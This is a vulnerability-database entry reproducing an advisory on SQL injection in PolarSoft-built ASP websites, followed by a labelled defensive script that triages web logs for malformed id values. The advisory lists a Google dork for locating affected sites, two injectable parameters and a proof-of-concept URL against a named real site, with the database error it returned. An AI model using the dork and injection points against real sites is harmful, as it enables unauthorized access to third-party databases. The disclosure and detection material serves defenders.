Website Design By PolarSoft® Inc. GoPolar SQL Injection Vulnerability

Vulnerability ID 1034841 Vulnerability type
Published 2018-06-03 Updated 2018-06-03
CVE ID N/A CNNVD-ID N/A
Platform N/A CVSS score N/A
|Vulnerability source
https://cxsecurity.com/issue/WLB-2018060031
|Vulnerability details
Vulnerability details have not yet been disclosed.
|Vulnerability EXP
#################################################################################################

# Exploit Title : Website Design PolarSoft® Inc. GoPolar SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos 
# Date : 03/06/2018
# Vendor Homepages : polarsoft.com ~ gopolar.com ~ templated.co
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89

#################################################################################################

# Description : PolarSoft is a creative team of design and development professionals who apply advanced technology to solve complex communications problems.
PolarSoft team brings together decades of deep experience in human-interface design, distributed object-oriented databases, direct digital control (DDC), networking and real-time systems. 
PolarSoft is the largest independent supplier of BACnet software products worldwide.

# Google Dork : intext:''website design: PolarSoft® Inc.''

# Exploit : /news.asp?id=[SQL Injection]

# Exploit : /memdetail.asp?id=[SQL Injection]

#################################################################################################

# Example Site =>  dfi.org/news.asp?id=193%27 => [ Proof of Concept ] => archive.is/BCoTV

# SQL-DB Error => 

Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'id=193''.
/news.asp, line 193

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################
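For defenders running one of the affected sites, the following is an added example (not part of the original advisory, and not PolarSoft code) that triages web server logs for requests to the two pages named above whose `id` value is not a plain integer, and notes whether the JET error 80040e14 was returned. The log lines are constructed, and the `|line|code|description` suffix on the query field is an assumption about how the server records ASP errors.

```python
import re
from urllib.parse import parse_qs

ENDPOINTS = {"/news.asp", "/memdetail.asp"}  # pages named in the advisory
JET_ERROR = "80040e14"                       # error code shown in the advisory

# Constructed sample in W3C extended log format (not real traffic).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2018-06-03 10:00:01 192.0.2.10 GET /news.asp id=193 200
2018-06-03 10:00:05 192.0.2.44 GET /news.asp id=193%27|193|80040e14|Syntax_error_in_string_in_query_expression_'id=193''. 500
2018-06-03 10:00:09 192.0.2.44 GET /memdetail.asp id=12%27 200
2018-06-03 10:00:12 192.0.2.10 GET /about.asp - 200
"""

def scan(log_text):
    """Return one finding per request whose id parameter is not a plain integer."""
    fields, findings = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # column names for the rows below
            continue
        if not line or line.startswith("#"):
            continue
        row = dict(zip(fields, line.split(" ")))
        if row.get("cs-uri-stem", "").lower() not in ENDPOINTS:
            continue
        # Assumption: an ASP error is logged as "|line|code|description"
        # appended to the query string; split it off before parsing.
        params, _, asp_error = row.get("cs-uri-query", "").partition("|")
        ids = parse_qs(params, keep_blank_values=True).get("id")
        if not ids or all(re.fullmatch(r"\d+", v) for v in ids):
            continue                           # no id, or a well-formed integer id
        findings.append({
            "client": row.get("c-ip"),
            "page": row["cs-uri-stem"],
            "id": ids[0],                      # URL-decoded value as received
            "db_error": JET_ERROR in asp_error or row.get("sc-status") == "500",
        })
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with `db_error` set means the malformed value reached the query; the lasting fix is to reject non-integer `id` values and bind the value as a typed parameter instead of concatenating it into the SQL string.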